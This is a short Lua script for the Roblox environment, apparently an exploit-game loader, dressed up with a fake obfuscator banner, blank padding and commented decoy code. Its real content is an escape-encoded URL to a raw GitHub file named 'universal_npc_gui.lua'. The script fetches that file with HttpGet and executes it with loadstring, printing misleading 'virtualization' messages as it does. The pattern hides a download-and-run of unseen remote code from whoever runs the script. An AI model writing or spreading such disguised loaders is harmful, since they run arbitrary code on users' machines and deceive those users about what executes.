--[[
    [!] PROTECTED BY MORTAR OBFUSCATOR v4.1.2
    [!] ID: 9(ALL)64/11/0/4/1/84/128
]]--



































































-- L0_0 = function() local _ = 1029384756; return string.char(math.random(65,90)) end
-- function v_0x9A(_x) return (_x * 0xAF) % 0xFF end
-- local _0xBC = {0x12, 0xAF, 0x3C, 0x99, 0x22, 0xFE, 0x01, 0x88, 0x74, 0x23}
-- while true do if 1+1==3 then break end; local _dummy = "VM_START"; break end
-- setfenv(1, getfenv(0)); local _native = typeof(readfile) == "function"
-- for i=1, 400 do local a = i * 2; a = a / 2 end
-- [[ MORTAR VIRTUAL MACHINE LOADING ]] --

-- Encoded URL String
local _0xURL = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\115\101\114\103\101\101\118\105\108\121\097\048\048\057\045\103\105\102\047\117\110\105\118\101\114\115\097\108\095\110\112\099\095\103\117\105\046\108\117\097\047\109\097\105\110\047\117\110\105\118\101\114\115\097\108\095\110\112\099\095\103\117\105\046\108\117\097"

local function _0xExecute(_0xSource)
    local _0xSuccess, _0xData = pcall(function()
        return game:HttpGet(_0xSource)
    end)

    if _0xSuccess then
        local _0xFunc, _0xErr = loadstring(_0xData)
        if _0xFunc then
            print("[MORTAR] Virtualization Success. Executing...")
            task.spawn(_0xFunc)
        else
            warn("[MORTAR] Bytecode Error: " .. tostring(_0xErr))
        end
    else
        warn("[MORTAR] Connection Error: 0x404")
    end
end

_0xExecute(_0xURL)
